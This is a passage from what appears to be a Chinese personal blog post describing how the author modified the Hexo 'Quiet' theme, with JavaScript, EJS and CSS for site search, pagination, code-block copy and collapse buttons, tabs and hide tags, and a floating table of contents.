    top: -12px;
    left: 2px;
    }
    }

    .breadcrumb li::before {
    color: #898fa0;
    content: ">";
    margin: 0 5px;
    }

    ​ 修改一下对于手机端的适配:

    @media screen and (max-width:660px) {
    .header {
    .header-top {
    .h-left {
    flex-grow: 3;
    }
    ...

    效果

    customBreadcrumb

    png

    function categoriesBreadcrumb()

    png

    hexo-tag-aplayer 与 hexo-blog-encrypt 冲突

    ​ 这似乎是个通病,无论什么主题都有这种问题。

    ​ 在使用 Aplayer 的推文前面加上标记:

    APlayer: true

    ​ 从 APlayer: APlayer 是一个简约且漂亮的 HTML5 音乐播放器,支持多种模式,包括播放列表模式、吸底模式 (gitee.com) 搞到 APlayer.min.cssAPlayer.min.js 放到对应目录下。

    ​ 修改 header.ejs

    <% if(page.APlayer) { %>
    <%- css('css/third-party/APlayer.min.css') %>
    <%- js('js/third-party/APlayer.min.js') %>
    <% } %>

    source/_config.yml 下设置参数避免重复调用(hexo-tag-aplayer/docs/README-zh_cn.md at master · MoePlayer/hexo-tag-aplayer (github.com)

    aplayer:
    asset_inject: false

    ​ OK 了,我想 hexo-tag-map 插件也是同理,不过这个插件我不太喜欢,也很久没用了,还是不设置了。

    Giscus 评论系统

    ​ 将评论系统改成:giscus

    tabs

    ​ 使用方法:

    {% tabs Unique name, [index] %}
    <!-- tab [Tab caption] [@icon] -->
    Any content (support inline tags too).
    <!-- endtab -->
    {% endtabs %}

    Unique name : Unique name of tabs block tag without comma.
    Will be used in #id's as prefix for each tab with their index numbers.
    If there are whitespaces in name, for generate #id all whitespaces will replaced by dashes.
    Only for current url of post/page must be unique!
    [index] : Index number of active tab.
    If not specified, first tab (1) will be selected.
    If index is -1, no tab will be selected. It's will be something like spoiler.
    Optional parameter.
    [Tab caption] : Caption of current tab.
    If not caption specified, unique name with tab index suffix will be used as caption of tab.
    If not caption specified, but specified icon, caption will empty.
    Optional parameter.
    [@icon] : FontAwesome icon name (full-name, look like 'fas fa-font')
    Can be specified with or without space; e.g. 'Tab caption @icon' similar to 'Tab caption@icon'.
    Optional parameter.

    tab 名字为第一个 Tab

    只有图标 没有 Tab 名字

    名字+icon

    hide

    ​ 搬运自 butterfly:Butterfly 安裝文檔(三) 主題配置-1 | Butterfly

    ​ 2.2.0 以上提供

    ​ 請注意,tag-hide 內的標簽外掛 content 內都不建議有 h1 - h6 等標題。因為 Toc 會把隱藏內容標題也顯示出來,而且當滾動屏幕時,如果隱藏內容沒有顯示出來,會導致 Toc 的滾動出現異常。

    inline

    inline 在文本里面添加按鈕隱藏內容,只限文字

    ​ ( content 不能包含英文逗號,可用 &sbquo;)

    哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

    門裏站着一個人? {% hideInline 閃 %}

    哪個英文字母最酷?因為西裝褲(C 裝酷)

    門裏站着一個人?

    Block

    ​ block 獨立的 block 隱藏內容,可以隱藏很多內容,包括圖片,代碼塊等等

    ​ ( display 不能包含英文逗號,可用 &sbquo;)

    查看答案
    {% hideBlock 查看答案 %}
    傻子,怎麼可能有答案
    {% endhideBlock %}

    查看答案

    傻子,怎麼可能有答案

    Toggle

    ​ 如果你需要展示的內容太多,可以把它隱藏在收縮框裏,需要時再把它展開。

    ​ ( display 不能包含英文逗號,可用&sbquo;)

    {% hideToggle Butterfly 安裝方法 %}
    在你的博客根目錄裏

    git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    如果想要安裝比較新的 dev 分支,可以

    git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    {% endhideToggle %}
    Butterfly 安裝方法

    在你的博客根目錄裏

    git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    如果想要安裝比較新的 dev 分支,可以

    git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    CSS 与 LESS

    ​ 一些浏览器似乎不支持 CSS 文件使用的一些语法,换成 LESS 就可行!

    png

    Inject

    介绍

    ​搬运自:Butterfly 安裝文檔(四) 主題配置-2 | Butterfly

    如想添加额外的 js/css/meta 等等东西,可以在 Inject 里添加,支持添加到head</body> 标签之前)和 bottom</html> 标签之前)。

    请注意:以标准的 html 格式添加内容

    inject:
    head:
    - <link rel="stylesheet" href="/self.css">
    bottom:
    - <script src="xxxx"></script>

    ​这样还绕开了一些 JS 被加密插件搞崩的问题,真是太棒了!

    实现

    post_head.ejs 里添加:

    <% if(page.inject) { %>
    <% if(page.inject.head) { %>
    <% for(let i = 0; i < page.inject.head.length; i++){ %>
    <%- page.inject.head[i] %>
    <% } %>
    <% } %>
    <% } %>

    footer.ejs 里添加:

    <% if(page.inject) { %>
    <% if(page.inject.bottom) { %>
    <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
    <%- page.inject.bottom[i] %>
    <% } %>
    <% } %>
    <% } %>

    折叠目录 2024/11/11

    ​现在目录终于可以像 butterfly 等主题一样折叠了!如果不想要折叠目录,需要在文章标头设置:

    toc_collapsed: false

    其它

    • 还有一些 css 的调整没有放上去,按着自己的审美随便调了下。
    • 得益于自己的兴趣和 ChatGPT 强大的能力,让我即使没有系统地学过前端知识也能够编写许多代码,确实是个深坑啊!
    • 原主题还有一点编译错误,找机会修一修。
    • 最好把各种颜色都用变量存起来,不然太屎山了。
    • 想起了当时实习的时候看同事写的屎山代码,我已经尽力把代码写的比较规范了……
    ]]>
    + 前言

    ​ 这个 Quiet 主题的布局个人是很喜欢的,风格简洁且小众。可惜它相比于主流的 NexTButterflyFluid 等的功能还是太少了😇,于是决定魔改一下它。

    ​ 这篇博客记录了给这个主题添加的各种功能。

    正文

    站内搜索

    ​ 博客里 bb 了太多东西,考虑加一个站内搜索方便检索一下之前的文章。

    ​ 安装完 hexo-generator-search 插件后,hexo g 就会在 public 文件夹下创建 ./search.xml,这会把所有博客的文章内容整合进去。

    png

    后端(算是吧)

    ​ 接下来就是靠 JS 如何检索文章。Butterfly 已经有自带检索文章的功能了,研究了一会儿没研究出怎么把代码偷下来……找到了一个从零配置搜索功能的文章:

    ​ 核心就是下面这个 search.js 了,魔改一下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
    // only match artiles with not empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
    index_title = data_title.indexOf(keyword);
    index_content = data_content.indexOf(keyword);

    if (index_title < 0 && index_content < 0) {
    isMatch = false;
    } else {
    if (index_content < 0) {
    index_content = 0;
    }
    if (i == 0) {
    first_occur = index_content;
    }
    // content_index.push({index_content:index_content, keyword_len:keyword_len});
    }
    });
    } else {
    isMatch = false;
    }
    // show search results
    if (isMatch) {
    str += "<li><a href='" + data_url +
    "' class='search-result-title'>" + data_title + "</a>";
    var content = data.content.trim().replace(/<[^>]+>/g, "");
    if (first_occur >= 0) {
    // cut out 100 characters
    var start = first_occur - 20;
    var end = first_occur + 80;
    if (start < 0) {
    start = 0;
    }
    if (start == 0) {
    end = 100;
    }
    if (end > content.length) {
    end = content.length;
    }
    var match_content = content.substr(start, end);
    // highlight all keywords
    keywords.forEach(function (keyword) {
    var regS = new RegExp(keyword, "gi");
    match_content = match_content.replace(regS,
    "<em class=\"search-keyword\">" +
    keyword + "</em>");
    });
    str += "<p class=\"search-result\">" + match_content +
    "...</p>"
    }
    str += "</li>";
    }
    });
    str += "</ul>";
    if (str.indexOf('<li>') === -1) {
    document.getElementById(match_count_id).textContent = "";
    return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容,更换下搜索词试试吧~<span></ul>";
    }
    else
    {
    document.getElementById(match_count_id).innerHTML = "匹配到 <b><font size=\"5px\"><font color=\"#424242\">" + str.match(/<li>/g).length + "</font></font></b> 个结果。";
    }
    $resultContent.innerHTML = str;
    });
    }
    });
    }

    ​ 大致意思就是读取输入框 search_id 里的内容,从 path./search.xml)检索内容,将检索到的内容和计数分别以列表形式追加到 content_idmatch_count_id 中。

    前端

    search.ejs

    ​ OK,后端就是这样,接下来写前端 search.ejs

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <div class="page-header">
    <div class="search-dialog">
    <span id="local-search" class="local-search local-search-plugin">
    <h2>站内搜索</h2>
    <div class="local-search-input-box">
    <img class="search_icon" src="<%- theme.icon.search %>" />
    <input type="search" placeholder="输入关键字以搜索……" id="local-search-input" class="local-search-input-cls" />
    </div>
    <div id="local-search-result" class="local-search-result-cls"></div>
    <hr></hr>
    <p id="local-search-match-count" class="local-search-match-count"></p>
    </span>
    </div>
    <script>
    if ($('.local-search').size()) {
    $.getScript('/js/search.js', function () {
    searchFunc('/search.xml', 'local-search-input', 'local-search-result', 'local-search-match-count')
    })
    }
    </script>
    </div>

    search.css

    search.css 设计一下布局:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    .page-header{
    display: flex;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search {
    position: relative;
    text-align: left;
    display: grid;
    }
    .local-search-input-box {
    display: flex;
    height: 24px;
    margin: 20px 10px 0 10px;
    padding: 4px 12px;
    border-radius: 20px;
    border: 2px solid #898fa0;
    color: #666;
    font-size: 14px;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    }
    .local-search-input-cls {
    width: 100%;
    /* margin: 10px 0; */
    color: #12183A;
    font-size: 16px;
    padding-left: 0.6em;
    border: none;
    outline:none;
    }
    a.search-result-title {
    display: flow !important;
    width: auto !important;
    height: auto !important;
    margin-left: 0 !important;
    }
    .local-search-result-cls {
    overflow-y: overlay;
    max-height: calc(80vh - 200px);
    width: 100%;
    margin: 20px 0;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls {
    margin: 20px 10px;
    }
    }
    .local-search-empty {
    color: #888;
    line-height: 44px;
    text-align: center;
    display: block;
    font-size: 18px;
    font-weight: 400;
    }
    .local-search-result-cls ul {
    min-width: 400px;
    max-width: 900px;
    max-height: 600px;
    min-height: 0;
    height: auto;
    margin: 15px 5px 15px 20px;
    padding-right: 30px;
    }
    @media screen and (max-width: 800px) {
    .local-search-result-cls ul {
    min-width: auto;
    max-width: max-content;
    max-height: 70vh;
    min-height: auto;
    padding: 0 10px 10px 10px 10px;
    }
    }
    .local-search-result-cls ul li {
    text-align: left;
    border-bottom: 1px solid #bdb7b7;
    padding-bottom: 10px;
    margin-bottom: 20px;
    line-height: 30px;
    font-weight: 400;
    }
    .local-search-result-cls ul li:last-child {
    border-bottom: none;
    margin-bottom: 0;
    }
    .local-search-result-cls ul li a {
    margin-top: 20px;
    font-size: 18px;
    text-decoration: none;
    transition: all .3s;
    font-weight: bold;
    color: #12183A;
    }
    .local-search-result-cls ul li a:hover {
    text-decoration:underline;
    }
    .local-search-result-cls ul li p {
    margin-top: 10px;
    font-size: 14px;
    max-height: 124px;
    overflow: hidden;
    }
    .local-search-result-cls ul li em.search-keyword {
    color: #00F;
    font-weight:bold;
    font-style: normal;
    }

    .search_icon{
    width: 14px;
    height: 14px;
    }
    .search-dialog {
    display: block;
    padding: 64px 80px 20px 80px;
    width: 100%;
    align-items: center; /* 在垂直方向上居中对齐子元素 */
    margin: 0 0 20px;
    }
    @media screen and (max-width: 800px) {
    .search-dialog {
    box-sizing: border-box;
    top: 0;
    left: 0;
    margin: 0;
    width: 100%;
    height: 100%;
    border-radius: 0;
    padding: 50px 15px 20px 15px;
    }
    }
    .local-search-match-count{
    padding: 20px 20px 0 20px;
    color: #12183A;
    }
    .search-dialog h2{
    display: inline-block;
    width: 100%;
    margin-bottom: 20px;
    color: #424242;
    font-size: 1.7rem;
    }
    .search-close-button:hover {
    filter: brightness(120%);
    }
    #local-search .search-dialog .local-search-box {
    margin: 0 auto;
    max-width: 100%;
    width: 100%;
    }
    .custom-hr, .search-dialog hr {
    position: relative;
    margin: 0 auto;
    border: 1px dashed #bdb7b7;
    width: calc(100% - 4px);
    }
    input[type="search"]::-webkit-search-cancel-button {
    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }

    部署

    index.less 导入 css:

    1
    @import "./plugin/search.css";

    ​ 我把这个搜索模块放到了统计页面下 grouping 前,看起来还不错,然后设置一个开关控制这个功能是否启用。

    1
    2
    3
    <% if(theme.search && is_archive()) { %>
    <%- partial('_widget/search') %>
    <% } %>

    演示

    ​ 本地是秒出结果的,部署上去的话会比较卡,乱输的话还会崩溃 emmm 手机试了下没加载成功……果然还是 bb 太多了。

    png

    翻页功能改进

    ​ 这个主题只能提供上一页和下一页两个翻页功能,一页一页地翻效率太低了,不适合这个目前 bb 了 28 页的的博客,修改一下。

    方法论

    ​ hexo 渲染博客会根据文章数量进行分页。查一下 API:变量 | Hexo

    变量描述类型
    page.per_page每页显示的文章数量number
    page.total总页数number
    page.current目前页数number
    page.current_url目前分页的网址string
    page.posts本页文章 (Data Model)object
    page.prev上一页的页数。如果此页是第一页的话则为 0number
    page.prev_link上一页的网址。如果此页是第一页的话则为 ''string
    page.next下一页的页数。如果此页是最后一页的话则为 0number
    page.next_link下一页的网址。如果此页是最后一页的话则为 ''string
    page.path当前页面的路径(不含根目录)。我们通常在主题中使用 url_for(page.path)string

    ​ 对于首页(index),有 page.prev_linkpage.next_link 两个变量可以使用,所以实现上一页和下一页的功能是比较容易的。

    ​ 但要是想翻到其它页,得使用其它变量了。

    ​ 观察网站的网址。除了第 1 页的网址是 /,其他都是 /page/X

    ​ 所以根据 page.currentpage.total 足以写出翻页逻辑了,设置一个变量 pagination 控制左右显示的页数。

    代码

    home.ejs

    ​ 修改 home.ejs

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    <div class="change-page">
    <div class="change-page">
    <% if(page.prev !==0 && theme.pagination !== 1){ // 前一页 %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
    <a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %> %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>

    home.less

    ​ 再调整 home.less

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }

    演示

    png

    ​ 现在翻页不仅可以翻到上一页和下一页,还可以翻到首页、尾页以及周围的页数。如果周围的页数与首页和尾页不连续,添加省略号。

    首页显示 description

    ​ 在主页文章的 description 以更好地展示这篇文章在大致在 bb 什么。

    ​ 这对加密的文档,post.excerpt 会一律显示“这里有东西被加密了,需要输入密码查看哦。”,大概是 hexo-blog-encryptpost.excerpt 给强行替换了,我想目前的解决的办法是换一个变量名称?所以按 Buteerfly 的样式将关键词改成了 description。

    代码

    home.ejs

    home.ejs 中找到 post-block-content-info,加上显示 post.description 的代码:

    1
    2
    3
    <span class="post-block-content-info-description">
    <%= post.description %>
    </span>

    home.less

    home.less 修改样式:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    .post-card-description {
    padding: 10px 16px;
    text-align: right;
    flex-grow: 1;
    font-size: 14px;
    font-weight: 500;
    line-height: 36px;
    color: #999;
    }

    演示

    ​ 最终演示:

    png

    代码块辅助

    ​ 对于又臭又长的代码,设计复制代码按钮、显示代码语言和隐藏代码块三个实用功能。(借鉴自 Butterfly)

    方法论

    ​ 这个主题在渲染 markdown 的代码块语句时,会把它渲染成下图所示的形式:

    png

    代码

    highlight_tools.ejs

    highlight_tools.ejs<pre> 元素获取了,再把相关参数一并送给 highlight_tools.js

    感觉这么写代码有点不规范,先这样吧!

    1
    2
    3
    4
    5
    <%- js('js/widget/highlight_tools.js') %>
    <script>
    var codeBlocks = document.querySelectorAll('pre');
    createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // 调用函数并传递参数
    </script>

    highlight_tools.js

    function createHighlightTools()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
    codeBlocks.forEach(function (codeBlock) {
    if (!codeBlock.querySelector('code'))
    return;
    var container = createContainer(codeBlock);
    createCopyButton(container, codeBlock, copyIcon);
    createCodeLangText(container, codeBlock);
    createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
    setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
    });
    }

    ​ 先找找这个 <pre> 有没有 <code> 这个子元素,防止误判。

    • createContainer() 给代码块顶端包一层,用于放置 UI。

    ​ 然后依次实现三个功能:

    • createCopyButton():创建复制按钮
    • createCodeLangText():代码语言提示文本
    • createCloseCodeBlockButton():关闭代码块功能
    function createContainer()
    1
    2
    3
    4
    5
    6
    7
    8
    function createContainer(codeBlock) {
    // 创建包裹代码块和按钮的容器元素
    var container = document.createElement('div');
    container.className = 'hightlight-tools';
    // 将容器元素插入到代码块之前
    codeBlock.parentNode.insertBefore(container, codeBlock);
    return container;
    }

    ​ 这样,在代码块上方就会多一个 <div class="highlight_tools">

    png

    function createCopyButton()

    ​ 之前找的大都要我去引用一个叫 clipboard.js 的东西,结果下载下来引用报错,找了一个不需要插件的代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    function createCopyButton(container, codeBlock, icon) {
    var button = document.createElement('button');
    button.className = 'copy-button';
    button.type = 'button';
    button.title = 'copy-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = "已复制";
    // 添加类名
    span.className = 'copy-notice';
    // 将文字添加到容器元素内
    container.appendChild(span);

    button.addEventListener('click', function () {
    // 获取代码块的文本内容,包括换行符
    var code = codeBlock.innerText;
    // 创建一个临时的 textarea 元素,并将代码块的内容设置为其值
    var textarea = document.createElement('textarea');
    textarea.value = code;
    // 将 textarea 元素追加到 body 中
    document.body.appendChild(textarea);
    // 选中 textarea 中的文本
    textarea.select();
    // 执行复制操作
    document.execCommand('copy');
    // 移除临时的 textarea 元素
    document.body.removeChild(textarea);
    // 已复制
    span.style.opacity = 1;
    // 2 秒后将目标元素的透明度设置为 0
    setTimeout(function () {
    span.style.opacity = 0;
    }, 1000);
    });
    }

    ​ 原文中获取代码内容的代码为 var code = codeBlock.textContent; 这么做会舍弃换行符,应改为 var code = codeBlock.innerText;

    ​ 同时加上”已复制“的提示文本。

    function createCodeLangText()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    function createCodeLangText(container, codeBlock) {
    // 创建提示文字
    // 创建 <span> 元素
    var span = document.createElement('span');
    span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // 代码语言
    if (span.textContent === 'EBNF')
    span.textContent = '';
    // 添加类名
    span.className = 'code-lang';
    // 将文字添加到容器元素内
    container.appendChild(span);
    }

    ​ 获取 hljs 类中另一个类的名称,即为代码语言。如果 markdown 中没有设置代码语言,会渲染成 ebnf 类,把它替换为空。

    function createCloseCodeBlockButton()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
    {
    var button = document.createElement('button');
    button.className = 'close-code-block-button';
    button.type = 'button';
    button.title = 'close-code-block-button';
    button.style.backgroundImage = 'url("' + icon + '")';
    // 将按钮添加到容器元素内
    container.appendChild(button);
    if(Boolean(highlight_shrink))
    {
    var hljs = codeBlock.querySelector('.hljs');
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }
    button.addEventListener('click', function () {
    var hljs = codeBlock.querySelector('.hljs');
    if (!hljs.classList.contains('closed')) {
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }else{
    button.style.transform = "rotate(0deg)";
    hljs.classList.remove("closed");
    }
    });
    }

    ​ 获取 hljs类,给它加一个 closed类,剩余的逻辑交给 css 吧。

    ​ 文章新增参数 highlight_shrink,如果为 true,默认代码块就是关闭的。

    function setHighlightHeightLimit()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
    {
    // 限制代码块最大长度
    if (HighlightHeightLimit != "")
    {
    var hljs = codeBlock.querySelector('.hljs');
    hljs.style.maxHeight = HighlightHeightLimit;
    }
    }

    ​ 控制代码块最大长度。这个值由 page.highlight_height_limit 控制。

    highlight_tools.css

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }

    右边栏及目录

    ​ 这个主题自带 toc 功能,用的是 hexo 自带的 toc 功能,但是啥布局也没写……就一直没用。

    ​ 之前的目录一直用的是 hexo-toc 插件,但是这只能放到文章的一个大片段里,不能随着阅读跟随,体验不太好。

    ​ 决定重新设计一个目录架构,放到文章右侧并实时跟随。

    ​ hexo-toc 插件跟 自带的 toc 冲突了,把它卸了。

    1
    npm uninstall hexo-toc

    方法论

    ​ 参考默认的 toc:辅助函数(Helpers)| Hexo

    ​ 使用 <%- toc(page.content,{list_number:false}) %> 语句就会一阵输出目录的内容:

    png

    ​ 对于 hexo 自带的 toc 功能,它会给所有标题添加 ID,ID 内容为标题的内容,同时生成连接 #XXX,使其可以跳转到目标位置。

    ​ 对于放到网址会有歧义的字符,会用 - 替代(hexo-toc 直接删掉这个字符,我想这是这个插件跟默认的 toc 冲突的原因)。

    ​ 对于重名的标题,会在后面追加 -X 作为区分。

    但是这个自带的 toc 似乎有 bug,某些结构的目录并不会把所有的 <li> 都放在 <ol class="toc-child"></ol> 中,而且碰 hexo-blog-encrypt 就废了,所以我打算根据它默认生成的目录结构重写一份生成目录的逻辑。

    代码

    rightside.ejs

    ​ 暂时把主题原来的 goTop.ejs 取代了换成侧边栏:rightside.ejs

    • hidden 会让目录及其按钮隐藏起来,这是加密插件的存在而设计。
    • toc.js 控制着目录生成的逻辑。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
